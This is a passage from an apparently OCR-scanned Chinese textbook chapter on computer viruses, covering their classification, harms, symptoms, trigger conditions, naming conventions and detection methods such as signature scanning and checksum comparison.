(2) 传染 一 般 可 执行 文件 的 病毒 。 

这 种 病毒 寄生 于 一 般 以 COM 或 EXE 为 扩展 名 的 可 执行 文件 中 ， 或 者 扩展 名 为 OVL、 
OVR、SYS、OBJ 等 可 执行 文件 中 。 病 毒 传染 可 执行 文件 后 ， 将 自身 链接 于 被 传染 程序 的 
头 部 或 尾部 。 这 种 病毒 一 般 都 要 修改 被 传染 程序 的 长 度 和 一 些 控制 信号 ， 以 保证 病毒 成 为 
可 执行 程序 的 一 部 分 。 这 类 病毒 的 传染 性 很 强 。 

(3) 既 传染 文件 又 传染 磁盘 引导 区 的 病毒 。 

目前 出 现 了 一 些 病毒 ， 它 们 不 但 传染 可 执行 文件 ， 而 且 还 传染 磁盘 的 引导 区 。 如 Flip 
病毒 ， 新 世纪 病毒 等 。 新 世纪 病毒 不 仅 传染 以 COM 和 EXE 为 扩展 名 的 可 执行 文件 ， 而 且 
还 传染 硬盘 的 主 引导 区 。 这 类 计算 机 病毒 的 消除 工作 更 加 困难 ， 被 这 种 病毒 传染 的 系统 用 
FOR-MAT 命令 格式 化 硬盘 都 不 能 消除 病毒 。 

4. 按 病毒 存在 的 媒体 分 类 

按 病 毒 存 在 的 媒体 ， 病 毒 可 以 分 为 网 络 病毒 、 文 件 病毒 和 引导 型 病毒 。 网 络 病毒 通过 
计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 ; 文件 病毒 感染 计算 机 中 的 文件 (如 : COM、 EXE、 
DOC 等 );， 引导 型 病毒 感染 启动 扇 区 (Boot) 和 硬盘 的 系统 引导 扇 区 (MBR)。 还 有 这 三 种 情况 
的 混合 型 ， 例 如 : 多 型 病毒 (文件 和 引导 型 ) 感 染 文件 和 引导 扇 区 两 种 目标 ， 这 样 的 病毒 通 
常 都 具有 复杂 的 算法 ， 它 们 使 用 非常 规 的 办 法 侵入 系统 ， 同 时 使 用 了 加 密 和 变形 算法 。 

5. 按 病毒 破坏 的 能 力 分 类 


按 病 毒 破坏 的 能 力 大 小 ， 病 毒 可 分 为 以 下 几 种 : 

(1) 无 害 型 。 除 了 传染 时 减少 磁盘 的 可 用 空间 外 ， 对 系统 没有 其 他 影响 

(2) 无 危险 型 。 这 类 病毒 仅仅 是 减少 内 存 、 显 示 图 像 、 发 出 声音 及 同类 音响 。 

(3) 危险 型 。 这 类 病毒 在 计算 机 系统 操作 中 造成 严重 的 错误 。 

(4) 非常 危险 型 。 这 类 病毒 删除 程序 、 破 坏 数据 、 清 除 系统 内 存 区 和 操作 系统 中 重要 
的 信息 。 
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一 些 无 害 型 病毒 也 可 能 会 对 新 版 的 DOS、Windows 和 其 他 操作 系统 造成 破坏 。 例 如 : 
在 早期 的 病毒 中 ， 有 一 个 “Denzuk” 病 毒 在 360K 磁盘 上 很 好 地 工作 ， 不 会 造成 任何 破坏 ， 
但 是 在 后 来 的 高 密度 软盘 上 却 能 引起 大 量 的 数据 丢失 。 

6. 按 计算 机 病毒 特有 的 算法 分 类 

1) ”伴随 型 病毒 

这 一 类 病毒 并 不 改变 文件 本 身 ,它们 根据 算法 产生 EXE 文件 的 伴随 体 ， 具有 同样 的 名 
字 和 不 同 的 扩展 名 (COM)。 例 如 : XCOPY.EXE 的 伴随 体 是 XCOPY.COM。 病 毒 把 自身 写 
入 COM 文件 并 不 改变 EXE 文件 ， 当 DOS 加 载 文件 时 ， 伴 随 体 优先 被 执行 到 ， 再 由 伴随 
体 加 载 执行 原来 的 EXE 文件 。 

2) “蠕虫 ”型 病毒 

通过 计算 机 网 络 传播 ， 不 改变 文件 和 资料 信息 ， 利 用 网 络 从 一 台 机 器 的 内 存 传播 到 其 
他 机 器 的 内 存 ， 计 算 网 络 地 址 ， 将 自身 的 病毒 通过 网 络 发 送 。 有 时 它们 在 系统 存在 ， 一 般 
除了 内 存 ， 不 占用 其 他 资源 。 

3) ”寄生 型 病毒 

除了 “伴随 ”和 “蠕虫 ” 型 ， 其 他 病毒 均 可 称 为 寄生 型 病毒 ， 它 们 依附 在 系统 的 引导 
扇 区 或 文件 中 ， 通 过 系统 的 功能 进行 传播 。 按 其 算法 不 同 可 分 为 : 练习 型 病毒 ， 病 毒 自身 
包含 错误 ， 不 能 进行 很 好 的 传播 ， 例 如 一 些 病毒 在 调试 阶段 ;诡秘 型 病毒 ， 它 们 一 般 不 直 
接 修改 DOS 中 断 和 扇 区 数据 ， 而 是 通过 设备 技术 和 文件 缓冲 区 等 DOS 内 部 修改 ， 不 易 看 
到 资源 ， 使 用 比较 高 级 的 技术 ;变型 病毒 (又 称 幽灵 病毒 )， 这 一 类 病毒 使 用 一 个 复杂 的 算 
法 ， 使 自己 每 传播 一 份 都 具有 不 同 的 内 容 和 长 度 。 它 们 一 般 是 由 一 段 混 有 无 关 指令 的 解码 
算法 和 被 变化 过 的 病毒 体 组 成 。 

7. 按 表 现 性 质 分 类 

按 表 现 性 质 ， 病 毒 可 分 为 良性 的 和 恶性 的 。 良 性 的 危害 性 小 ， 不 破坏 系统 和 数据 ， 但 
大 量 占 用 系统 开销 ， 将 使 机 器 无 法 正常 工作 ， 陷 于 瘫痪 ， 如 国内 出 现 的 圆 点 病毒 就 是 良性 
的 。 亚 性 病毒 可 能 会 毁坏 数据 文件 ， 也 可 能 使 计算 机 停止 工作 ， 按 激活 的 时 间 可 分 为 定时 
的 和 随机 的 。 

恶意 病毒 的 “四 大 家 族 ” 如 下 : 

(1) 宏 病 毒 。 

(2) CIH 病毒 。 

(3) 蠕虫 病毒 。 

(4) 木马 病毒 。 


4.2 计算 机 病毒 的 危害 及 其 表现 
在 计算 机 病毒 出 现 的 初期 ， 说 到 计算 机 病毒 的 危害 ， 往 往 注重 于 病毒 对 信息 系统 的 直 


接 破坏 作用 ， 比 如 格式 化 硬盘 、 删 除 文件 数据 等 ， 并 以 此 来 区 分 恶性 病毒 和 良性 病毒 。 其 
实 这 些 只 是 病毒 劣迹 的 一 部 分 ， 随 着 计算 机 应 用 的 发 展 ， 人 们 深刻 地 认识 到 凡是 病毒 都 可 
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能 对 计算 机 信息 系统 造成 严重 的 破坏 。 
4.2.1 计算 机 病毒 的 危害 


计算 机 病毒 的 主要 危害 有 以 下 几 种 

1) ”病毒 激发 对 计算 机 数据 信息 的 直接 破坏 作用 

大 部 分 病毒 在 激发 的 时 候 直 接 破 坏 计算 机 的 重要 信息 数据 ， 所 利用 的 手段 有 格式 化 磁 
盘 、 改 写 文件 分 配 表 和 目录 区 、 删 除 重要 文件 或 者 用 无 意义 的 垃圾 数据 改写 文件 、 破 坏 
CMOS 设置 等 。 

2) ”占用 磁盘 空间 和 对 信息 的 破坏 

寄生 在 磁盘 上 的 病毒 总 要 非法 占用 一 部 分 磁盘 空间 。 引 导 型 病毒 的 一 般 侵占 方式 是 由 
病毒 本 身 占 据 磁 盘 引导 扇 区 ， 覆 盖 一 个 磁盘 扇 区 。 被 覆盖 的 扇 区 数据 永久 性 丢失 ， 无 法 恢 
复 ， 所 以 在 传染 过 程 中 一 般 不 破坏 磁盘 上 的 原 有 数据 ， 但 非法 侵占 了 磁盘 空间 ， 造 成 磁盘 
空间 的 严重 浪费 。 

3) ”抢占 系统 资源 

除 VIENNA、CASPER 等 少数 病毒 外 ， 其 他 大 多 数 病毒 在 动态 下 都 是 常 驻 内 存 的 ， 这 
就 必然 抢占 一 部 分 系统 资源 。 病 毒 所 占用 的 基本 内 存 长 度 大 致 与 病毒 本 身长 度 相当 。 病 毒 
抢占 内 存 ， 导 致 内 存 减少 ， 一 部 分 软件 不 能 运行 。 除 占用 内 存 外 ， 病 毒 还 抢占 中 断 ， 干 扰 
系统 运行 。 

4) ”影响 计算 机 运行 速度 

病毒 进驻 内 存 后 不 但 干扰 系统 运行 ， 还 影响 计算 机 速度 ， 主 要 表现 在 : 

(1) 病毒 为 了 判断 传染 激发 条 件 ， 总 要 对 计算 机 的 工作 状态 进行 监视 ， 这 相对 于 计算 
机 的 正常 运行 状态 既 多 余 又 有 害 。 

(2) 有 些 病毒 为 了 保护 自己 ， 不 但 对 磁盘 上 的 静态 病毒 加 密 ， 而 且 进 驻 内 存 后 的 动态 
病毒 也 处 在 加 密 状 态 ; 而 病毒 运行 结束 时 再 用 一 段 程序 对 病毒 重新 加 密 。 这 样 CPU 额外 执 
行 数 千 条 以 至 上 万 条 指令 。 

(3) 病毒 在 进行 传染 时 同样 要 插入 非法 的 额外 操作 ， 特 别 是 传染 软盘 时 不 但 计算 机 速 
度 明 显 变 慢 ， 而 且 软 盘 正 常 的 读 写 顺序 被 打 乱 ， 发 出 刺耳 的 噪声 。 

5) ”计算 机 病毒 错误 与 不 可 预见 的 危害 

计算 机 病毒 与 其 他 计算 机 软件 的 最 重要 差别 是 病毒 的 无 责任 性 。 编 制 一 个 完善 的 计算 
机 软件 需要 耗费 大 量 的 人 力 、 物 力 ， 经 过 长 时 间 调 试 完善 ， 软 件 才能 推出 。 但 在 病毒 编制 
者 看 来 既 没 有 必要 这 样 做 ， 也 不 可 能 这 样 做 。 很 多 计算 机 病毒 都 是 个 别人 在 一 台 计 算 机 上 
匆匆 编制 调试 后 就 向 外 抛 出 ， 绝 大 部 分 病毒 都 存在 不 同 程度 的 错误 。 计 算 机 病毒 错误 所 产 
生 的 后 果 往 往 是 不 可 预见 的 ， 反 病毒 工作 者 曾经 详细 指出 黑色 星期 五 病毒 存在 9 处 错误 ， 
乒乓 病毒 有 5 处 错误 等 。 但 是 人 们 不 可 能 花费 大 量 时 间 去 分 析 数 万 种 病毒 的 错误 所 在 。 大 
量 含 有 未 知 错误 的 病毒 扩散 传播 ， 其 后 果 是 难以 预料 的 。 

6) “计算 机 病毒 的 兼容 性 对 系统 运行 的 影响 

兼容 性 是 计算 机 软件 的 一 项 重要 指标 , 兼容 性 好 的 软件 可 以 在 各 种 计算 机 环境 下 运行 ， 
反之 兼容 性 差 的 软件 则 对 运行 条 件 “ 挑 肥 拣 瘦 ”， 要 求 机 型 和 操作 系统 版 本 等 ， 而 病毒 的 
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兼容 性 较 差 ， 常 常会 导致 死机 。 

7) “计算 机 病毒 给 用 户 造成 严重 的 心理 压力 

据 有 关 计 算 机 销售 部 门 统计 ， 计 算 机 售后 用 户 怀疑 计算 机 有 病毒 而 提出 咨询 约 占 售后 
服务 工作 量 的 60% 以 上 。 经 检测 确实 存在 病毒 的 约 占 70%， 另 有 30% 情 况 只 是 用 户 怀疑 ， 
而 实际 上 计算 机 并 没有 病毒 , 仅仅 怀疑 病毒 而 贸然 格式 化 磁盘 所 带 来 的 损失 更 是 难以 弥补 。 
不 仅 是 个 人 单机 用 户 ， 在 一 些 大 型 网 络 系统 中 也 难免 为 甄别 病毒 而 停机 。 总 之 计算 机 病毒 
像 “ 幽 灵 ” 一 样 笼罩 在 广大 计算 机 用 户 心头 ， 给 人 们 造成 巨大 的 心理 压力 ， 极 大 地 影响 了 
现代 计算 机 的 使 用 效率 ， 由 此 带 来 的 无 形 损失 是 难以 估量 的 。 


4.2.2 ”计算 机 病毒 的 表现 


计算 机 病毒 是 客观 存在 的 ， 客 观 存在 的 事物 总 有 它 的 特性 ， 计 算 机 病毒 也 不 例外 。 从 
实质 上 说 ， 计 算 机 病毒 是 一 段 程序 代码 ， 虽 然 它 可 能 隐藏 得 很 好 ， 但 也 会 留 下 许多 痕迹 。 
通过 对 这 些 蛛 丝 马 迹 的 判别 ， 我 们 就 能 发 现 计 算 机 病毒 的 存在 了 。 

计算 机 病毒 发 作 有 以 下 的 种 种 表现 : 

(1) 平时 运行 正常 的 计算 机 突然 经 常 性 无 缘 无 故地 死机 。 

(2) 操作 系统 无 法 正常 启动 。 

(3) 运行 速度 明显 变 慢 。 

(4) 以 前 能 正常 运行 的 软件 经 常 发 生 内 存 不 足 的 错误 。 

(5) 打印 和 通讯 发 生 异 常 。 

(6) 无 意 中 要 求 对 软盘 进行 写 操作 。 

(7) 以 前 能 正常 运行 的 应 用 程序 经 常 发 生死 机 或 者 非法 错误 。 

(8) 系统 文件 的 时 间 、 日 期 、 大 小 发 生变 化 。 

(9) 对 于 Word 文档 ， 另 存 时 只 能 以 模板 方式 保存 ， 无 法 另存 为 一 个 DOC 文档 。 

(10) 磁盘 空间 迅速 减少 。 

(11) 网 络 驱 动 器 卷 或 共享 目录 无 法 调用 。 

(12) 基本 内 存 发 生变 化 。 

(13) 收 到 陌生 人 发 来 的 电子 函件 。 

(14) 自动 链接 到 一 些 陌生 的 网 站 。 

一 般 的 系统 故障 是 有 别 于 计算 机 病毒 感染 的 。 系 统 故 障 大 多 只 符合 上 面 的 一 点 或 两 点 
现象 ， 而 计算 机 病毒 感染 所 出 现 的 现象 会 多 得 多 。 根 据 上 述 几 点 ， 就 可 以 初步 判断 计算 机 
和 网 络 是 否 感染 上 了 计算 机 病毒 。 在 学 习 、 使 用 计算 机 的 过 程 中 ， 可 能 还 会 遇 到 许 许多 多 
与 病毒 现象 相似 的 软 硬 件 故障 ， 所 以 用 户 要 多 阅读 、 参考 有 关 资 料 ， 了 解 检 测 病 毒 的 方法 ， 
并 注意 在 学 习 、 工 作 中 积累 经 验 ， 就 不 难 区 分 病毒 与 软 硬 件 故 障 了 。 


4.2.3 ”计算 机 病毒 的 状态 及 潜伏 期 


进入 传播 流行 中 的 计算 机 病毒 有 两 种 状态 ， 即 静态 病毒 和 动态 病毒 。 
静态 病毒 指 寄 生 于 存储 介质 (例如 软盘 、 硬 盘 、 磁 带 等 ) 上 的 计算 机 病毒 。 静 态 病毒 没 
有 处 于 加 载 状态 ， 不 能 进入 计算 机 内 存 ， 因 而 不 能 执行 病毒 的 传染 或 破坏 作用 。 
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动态 病毒 是 随 病毒 宿主 的 运行 ， 如 启动 病毒 寄生 的 软盘 、 硬 盘 ， 或 执行 染 有 病毒 的 程 
序 时 ， 病 毒 程序 进入 内 存 ， 处 于 运行 状态 或 通过 某 些 中 断 能 立即 获得 运行 权 的 计算 机 病毒 。 
病毒 的 传染 和 破坏 功能 主要 是 动态 病毒 执行 的 。 处 于 内 存 中 的 病毒 时 刻 监视 着 系统 的 运行 ， 
一 旦 传染 条 件 或 破坏 条 件 被 满足 ， 就 调用 病毒 程序 中 的 传染 模块 或 破坏 模块 ， 使 病毒 得 以 
扩散 ， 使 系统 蒙受 损失 。 

动态 病毒 在 计算 机 内 存 中 存在 的 时 间 称 为 动态 病毒 的 生命 期 。 动 态 病毒 的 生命 期 随 病 
毒 种 类 不 同 而 不 同 

常 驻 内 存 型 病毒 在 其 寄生 的 宿主 程序 执行 时 ， 计 算 机 病毒 就 在 内 存 中 开辟 一 块 “ 栖 生 
地 ”长 驻 于 内 存 之 中 。 当 其 原宿 主 程序 执行 完毕 退出 后 ， 病 毒 仍 保留 在 内 存 中 ， 并 通过 侵 
占 的 中 断 向 量 或 修改 的 系统 程序 模块 ， 监 视 系统 的 运行 ， 伺 机 进行 扩散 或 破坏 。 这 类 病毒 
的 生命 期 较 长 ， 会 一 直 延 续 到 下 一 次 重新 启动 或 停机 。“ 黑 色 星 期 五 ”、“ 黑 色 复 仇 者 ” 
等 传染 引导 区 的 病毒 均 是 这 种 常 驻 内 存 、 生 命 期 较 长 的 病毒 。 

不 常 驻 内 存 型 病毒 ， 如 维也纳 病毒 ， 随 着 其 病毒 宿主 程序 的 运行 而 进入 内 存 ， 并 在 病 
毒 宿主 程序 执行 完 之 前 根据 传染 或 破坏 的 条 件 ， 完 成 病毒 要 进行 的 传染 或 破坏 作用 。 当 宿 
主 程序 执行 完 时 ， 随 宿主 程序 一 起 退出 内 存 。 因 而 ， 不 常 驻 内 存 型 病毒 的 生命 期 较 短 。 

计算 机 病毒 进入 内 存 ， 变 成 动态 病毒 以 后 ， 并 不 马上 进行 破坏 或 表现 自己 即 显 示 一 定 
的 信息 或 图 画 ， 仅 仅 进行 不 断 地 传染 、 扩 散 活动 。 因 而 ， 我 们 很 不 容易 发 现 它们 。 只 有 当 
病毒 程序 破坏 或 表现 模块 的 触发 条 件 满 足 时 ， 如 某 日 某 时 病毒 才 破 坏 系统 或 显示 信息 ， 从 
而 暴露 自己 。 从 病毒 进入 内 存 到 其 破坏 或 表现 模块 被 触发 , 这 段 时 间 是 病毒 程序 的 潜伏 期 。 
显而易见 ， 一 种 病毒 的 潜伏 期 越 长 ， 病 毒 程序 的 传染 性 可 在 较 长 的 时 间 内 得 到 发 挥 ， 其 传 
染 的 范围 也 就 越 大 。 潜 伏 期 和 传染 性 之 间 的 关系 可 用 如 图 4-1 所 示 的 曲线 表示 。 


潜伏 期 


传染 性 


4-1 计算 机 病毒 传染 性 与 潜伏 期 的 关系 

病毒 的 潜伏 期 越 长 ， 说 明 病毒 隐藏 自己 的 潜伏 性 越 好 。 因 而 ， 病 毒 的 潜伏 性 可 用 其 潜 
伏 期 来 衡量 。 

计算 机 病毒 进入 内 存 ， 变 成 动态 病毒 后 ， 一 般 不 是 无 条 件 地 进行 传染 和 破坏 的 。 而 是 
需要 首先 判断 传染 条 件 或 破坏 条 件 是 否 满足 。 待 条 件 达到 时 ， 才 进行 相应 的 传染 或 破坏 活 
动 。 因 而 ， 计 算 机 病毒 的 活动 都 是 由 条 件 触发 来 实现 的 。 计 算 机 病毒 传染 活动 的 触发 ， 是 
当 系 统 工作 条 件 满足 病毒 传染 所 需 条 件 时 ， 病 毒 即将 符合 条 件 的 宿主 传染 。 而 病毒 的 破坏 
或 表现 活动 的 触发 ， 是 当 系 统 条 件 满足 时 。 病 毒 的 破坏 或 表现 模块 被 触发 ， 或 称 之 “被 激 
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活 ”， 即 开始 破坏 系统 或 在 被 传染 的 系统 上 表现 自己 。 计 算 机 病毒 的 一 般 工 作 流程 ， 可 用 
流程 图 简单 表示 出 来 ， 如 图 4-2 所 示 。 


4-2 计算 机 病毒 工作 流程 示意 图 


计算 机 病毒 在 一 定 条 件 下 触发 病毒 的 传染 模块 或 破坏 和 表现 模块 ， 也 就 是 在 满足 一 定 
条 件 下 实行 对 病毒 的 传染 模块 或 破坏 和 表现 模块 的 调用 过 程 。 计 算 机 病毒 传染 活动 或 破坏 
和 表现 活动 的 触发 条 件 可 以 是 多 种 多 样 的 。 

首先 ， 触 发 条 件 可 以 是 单个 条 件 或 复合 条 件 。 

1. 单条 件 触发 

仅仅 需要 一 个 条 件 即 可 触发 的 病毒 活动 是 单条 件 触 发 。 如 : 萨 达 姆 病毒 。 每 当中 断 向 
量 INT 21H 调用 8 次 时 ， 病 毒 的 表现 部 分 即 被 显示 。 


2. 复合 条 件 触发 


车 二 个 条 件 经 过 地 辑 组 合 后 的 条 件 称 为 复合 条 件 。 如 : “黑色 星期 五 ” 病毒 的 触发 条 
件 是 某 月 13 日 ， 并 且 又 是 星期 五 。 因 而 黑色 星期 五 病毒 是 复合 条 件 触发 的 ， 即 两 个 条 件 的 
地 给 “与 ”(* AND 。)。 

再 者 ， 计 算 机 病毒 的 触发 条 件 一 般 有 时 间 触发 条 件 、 功 能 触发 条 件 、 宿 主 触发 条 件 等 。 

D 时 间 角 发 条 件 

以 特定 的 时 间 进 行 触发 的 条 件 。 计 算 机 病毒 以 系统 日 期 (其 年 某 月 某 日) 或 系统 时 间 ( 基 
时 某 分 某 种) 为 触发 条 件 ， 或 作为 触发 的 复合 条 件 中 的 一 个 单条 件 。 

2) 功能 触发 条 件 

以 计算 机 所 提供 的 功能 作为 触发 条 件 。 这 些 计算 机 功能 包括 系统 的 软 、 硬 件 的 特定 功 
实现 ， 以 及 计算 机 的 一 些 指令 命令 的 执行 等 。 例 如 ， 一 条 COPY 命令 ， 革 个 中 断 向 量 
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的 调用 ， 或 者 一 条 指令 等 等 。 功 能 触发 条 件 也 可 与 时 间 触 发 条 件 或 其 他 功能 条 件 、 宿 主 条 
件 构 成 复合 条 件 。 

3) ”宿主 触发 条 件 

许多 计算 机 病毒 ， 尤 其 是 传染 可 执行 文件 型 的 病毒 ， 对 于 正在 运行 或 当前 目录 下 的 程 
序 或 正在 引导 中 的 磁盘 是 有 选择 性 的 。 如 4 月 1 日 病毒 仅 传染 扩展 名 为 COM 的 可 执行 文 
件 ， 而 阿拉 梅 达 病毒 只 传染 软磁盘 而 不 传染 便 磁 盘 。 

计算 机 病毒 一 般 只 传染 未 经 病毒 感染 过 的 软盘 和 可 执行 文件 。 因 此 ， 在 病毒 进行 传染 
前 一 定 会 校 验 被 选中 的 宿主 是 否 符合 未 曾 被 传染 过 这 个 条 件 。 


4.2.4 常见 的 计算 机 病毒 


1) 引导 型 、 病 毒 文 件 型 和 复合 型 病毒 

引导 型 病毒 有 大 麻 病毒 、2708 病毒 、 火 炬 病毒 、 小 球 病毒 、 美 丽 女孩 病毒 等 。 

文件 型 病毒 有 1575/1591 病毒 ，848 病毒 (感染 .COM 和 .EXE 等 可 执行 文件 )， 
Macro/Concept、Macro/Atoms 等 宏 病毒 (感染 .DOC 文件 )。 

复合 型 病毒 有 Flip 病毒 、 新 世纪 病毒 、One-half 病毒 等 。 

2) ”良性 病毒 和 恶性 病毒 

良性 病毒 有 小 球 病毒 、1575/1591 病毒 、 救 护 车 病毒 、 扬 基 病 毒 、Dabi 病毒 等 。 

恶性 病毒 有 黑色 星期 五 病毒 、 火 炬 病毒 、 米 开朗 琪 罗 病 毒 等 。 

病毒 类 型 的 识别 ， 最 简单 的 方法 就 是 从 病毒 的 名 称 上 看 ， 前 绥 表 示 该 病毒 发 作 的 操作 
平台 或 者 病毒 的 类 型 ，DOS 下 的 病毒 一 般 是 没有 前 绥 的 。 

病毒 名 为 该 病毒 的 名 称 及 其 家 族 ， 后 级 是 区 别 在 该 病毒 家 族 中 各 病毒 的 不 同 ， 用 字母 
或 用 数字 以 说 明 此 病毒 的 排序 和 大 小 。 

Trojan 表示 该 病毒 是 个 木马 ， 如 果 后 面 加 .a， 说 明 该 木马 的 第 一 个 变种 。 

WM 代表 Word 宏 病 毒 ; 

W97M 代表 Word 97 宏 病 毒 ; 

XM 代表 Excel 宏 病 毒 ; 

X97M 代表 在 Excel 97 下 制作 完成 的 Excel 宏 病 毒 ; 

XF 代表 Excel 程式 (Excel Formula) 病 毒 ; 

AM 代表 在 Access 95 下 制作 完成 并 传播 发 作 的 Access 的 宏 病 毒 ; 

A97M 代表 在 Access 97 下 制作 完成 并 传播 发 作 的 Access 的 宏 病 毒 ; 

W95 代表 Windows 95 病毒 ; 

Win 代表 感染 Windows 3.x 操作 系统 文件 的 病毒 ; 

W32 代表 感染 所 有 的 32 位 Windows 平台 的 病毒 ; 

WNT 代表 感染 32 位 Windows NT 操作 系统 的 病毒 ; 

HLLC 代表 高 级 语言 同伴 (High Level Language Companion) 病 毒 ; 

HLLP 代表 高 级 语言 寄生 (High Level Language Parasitic) 病 毒 ; 

HLLO 代表 高 级 语言 改写 (High Level Language Overwriting) 病 毒 ; 

Trojan/Troj 代表 特洛伊 木马 ; 
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VBS 代表 着 用 Visual Basic Script 程序 语言 编写 的 病毒 ; 
PWSTEAL 代表 窃取 密码 等 信息 的 木马 ; 
JAVA 代表 用 Java 程序 语言 编写 的 病毒 。 


4.3 ”计算 机 病毒 的 检测 与 防范 


近年 来 ,计算 机 病毒 的 泛滥 ， 全 世界 平均 不 到 20 分 钟 就 会 产生 一 个 新 的 病毒 。 这些 病 
毒 通过 Intemet 传 向 世界 各 个 角落 ， 这 意味 着 连 入 Internet 的 计算 机 平均 20 分 钟 就 有 可 能 
被 感染 一 次 。 按 每 天 开机 联网 2 小 时 计算 , 一 年 内 可 能 被 全 世界 所 有 最 新 病毒 感染 2190 次 。 

据 统计 ， 在 我 国企 业 ， 公 司 级 的 网 络 系统 中 ， 有 90% 的 计算 机 都 曾 受到 过 病毒 的 感染 。 
60% 以 上 的 计算 机 都 曾 因 病 毒 而 丢失 过 文件 、 数 据 等 。 计 算 机 病毒 的 侵犯 已 成 为 计算 机 安 
全 的 最 大 问题 ， 它 带 来 的 人 力 和 经 济 损失 是 巨大 的 。 

目前 ， 病 毒 在 设计 上 越 来 越 复 杂 ， 在 数量 上 呈 指 数 增长 ， 并 在 功能 和 形态 等 方面 都 发 
生 了 很 大 的 变化 ， 随 着 网 络 环境 的 普及 应 用 和 计算 机 软 硬 件 规模 的 增 大 ， 在 方便 人 们 使 用 
计算 机 的 同时 ， 也 扩展 了 病毒 的 传播 途径 ， 并 加 快 了 病毒 的 传播 速度 ， 而 且 加 大 了 检测 与 
防范 病毒 的 难度 。 因 此 需要 对 计算 机 病毒 进行 深入 的 研究 。 


4.3.1 计算 机 病毒 检测 方法 


磁盘 中 的 计算 机 病毒 可 分 成 引导 型 计算 机 病毒 和 文件 型 计算 机 病毒 。 对 这 两 种 病毒 的 
检测 原理 是 一 样 的 ， 但 由 于 它们 的 存储 方式 不 同 ， 检 测 方法 还 是 有 差别 的 。 

1. 比较 法 

比较 法 是 用 原始 备份 与 被 检测 的 引导 扇 区 或 被 检测 的 文件 进行 比较 。 比 较 时 不 需要 专 
用 的 检查 计算 机 病毒 的 程序 ， 只 要 用 常规 DOS 软件 和 PCTOOLS 等 工具 软件 就 可 以 进行 。 
而 且 比较 法 还 可 以 发 现 那些 尚 不 能 被 现 有 的 查 计算 机 病毒 的 程序 发 现 的 计算 机 病毒 。 由 于 
目前 还 没有 做 出 通用 的 能 查 出 一 切 计算 机 病毒 ， 或 通过 代码 分 析 ， 判 定 某 个 程序 中 是 否 含 
有 计算 机 病毒 的 查 毒 程序 ， 发 现 新 计算 机 病毒 就 只 有 用 比较 法 和 分 析 法 ， 有 时 必须 两 者 结 
合 来 共同 完成 。 

使 用 比较 法 能 发 现 异常 ， 如 文件 的 长 度 有 变化 ， 或 虽然 文件 长 度 未 发 生变 化 ， 而 文件 
内 的 程序 代码 发 生 了 变化 。 由 于 要 进行 比较 ， 保 留 好 原始 备份 是 非常 重要 的 ， 制 作 备份 时 
必须 在 无 计算 机 病毒 的 环境 里 进行 ， 制 作 好 的 备份 必须 妥善 保管 。 

比较 法 的 好 处 是 简单 、 方 便 ， 不 需要 专用 软件 。 缺 点 是 无 法 确认 计算 机 病毒 的 种 类 名 
称 。 另 外 ， 造 成 被 检测 程序 与 原始 备份 之 间 差 别 的 原因 尚 需 进一步 验证 ， 以 查 明 是 由 于 计 
算 机 病毒 造成 的 ， 或 是 由 于 DOS 数据 被 偶然 原因 ， 如 突然 停电 、 程 序 失控 、 恶 意 程序 等 破 
坏 的 。 另 外 ， 当 原始 备份 丢失 时 ， 比 较 法 就 不 起 作用 了 。 


2. 加 总 对 比 法 


根据 每 个 程序 的 档案 名 称 、 大 小 、 时 间 、 日 期 及 内 容 ， 加 总 为 一 个 检查 码 ， 再 将 检查 
码 附 于 程序 的 后 面 ， 或 是 将 所 有 检查 码 放 在 同一 个 数据 库 中 ， 再 利用 加 总 对 比 系统 ， 追 踪 
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并 记录 每 个 程序 的 检查 码 是 否 遭 算 改 ， 以 判断 是 否 感染 了 计算 机 病毒 。 这 种 技术 可 俩 测 到 
各 式 的 计算 机 病毒 ， 但 最 大 的 缺点 是 误 判 断 高 ， 且 无 法 确认 是 哪 种 计算 机 病毒 感染 的 ， 对 
于 隐形 计算 机 病毒 无 法 侦 测 到 。 

3. 搜索 法 

搜索 法 是 用 每 一 种 计算 机 病毒 体 含有 的 特定 字符 串 对 被 检测 的 对 象 进行 扫描 。 如 果 在 
被 检测 对 象 内 部 发 现 了 某 一 种 特定 字 节 串 ， 则 表明 该 字 节 串 包含 计算 机 病毒 。 国 外 对 这 种 
按 搜索 法 工作 的 计算 机 病毒 扫描 软件 叫 Virus Scanner。 计算 机 病毒 扫描 软件 由 两 部 分 组 成 : 
一 部 分 是 计算 机 病毒 代码 库 ， 含 有 经 过 特别 选 定 的 各 种 计算 机 病毒 的 代码 串 ， 另 一 部 分 是 
利用 该 代码 库 进行 扫描 的 扫描 程序 。 目 前 常见 的 防 杀 计算 机 病毒 软件 对 已 知 计算 机 病毒 的 
检测 大 多 采用 这 种 方法 。 计 算 机 病毒 扫描 程序 能 识别 的 计算 机 病毒 的 数目 完全 取决 于 计算 
机 病毒 代码 库 内 所 含 计算 机 病毒 的 种 类 多 少 。 因 此 ， 病 毒 代 码 库 中 计算 机 病毒 代码 种 类 越 
多 , 扫描 程序 能 认 出 的 计算 机 病毒 就 越 多 。 计算 机 病毒 代码 串 的 恰当 选择 也 是 非常 重要 的 ， 
如 果 随 意 从 计算 机 病毒 体内 选 一 段 作 为 代表 该 计算 机 病毒 的 特征 代码 串 ， 那 么 在 不 同 的 环 
境 中 ， 该 代码 串 可 能 并 不 真正 具有 代表 性 ， 也 就 不 能 将 该 特征 代码 串 所 对 应 的 计算 机 病毒 
检查 出 来 。 

另 一 种 情况 是 代码 串 不 应 含有 计算 机 病毒 的 数据 区 ， 数 据 区 是 会 经 常 变化 的 。 特 征 代 
码 串 的 选 定 水 平 也 是 判别 一 个 计算 机 病毒 扫描 程序 好 坏 的 重要 依据 。 一 般 情况 下 ， 代 码 串 
是 由 连续 的 若干 个 字 节 组 成 的 串 ， 但 是 有 些 扫描 软件 采用 的 是 可 变 长 串 ， 即 在 串 中 包含 有 
一 个 到 几 个 “模糊 ” 字 节 。 扫 描 软件 遇 到 这 种 串 时 ， 只 要 “模糊 ” 字 节 之 外 的 字 串 都 能 完 
好 匹配 ， 就 能 判别 出 计算 机 病毒 。 

这 种 扫描 法 的 缺点 也 是 明显 的 。 第 一 是 扫描 费时 ; 第 二 是 合适 的 特征 串 选择 难度 较 高 
第 三 是 特征 库 需 要 不 断 升 级 ;第 四 是 怀 有 恶意 的 计算 机 病毒 制造 者 得 到 代码 库 后 ， 会 很 容 
易 地 改变 计算 机 病毒 体内 的 代码 ， 生 成 一 个 新 的 变种 ， 使 扫描 程序 失去 检测 它 的 能 力 ， 第 
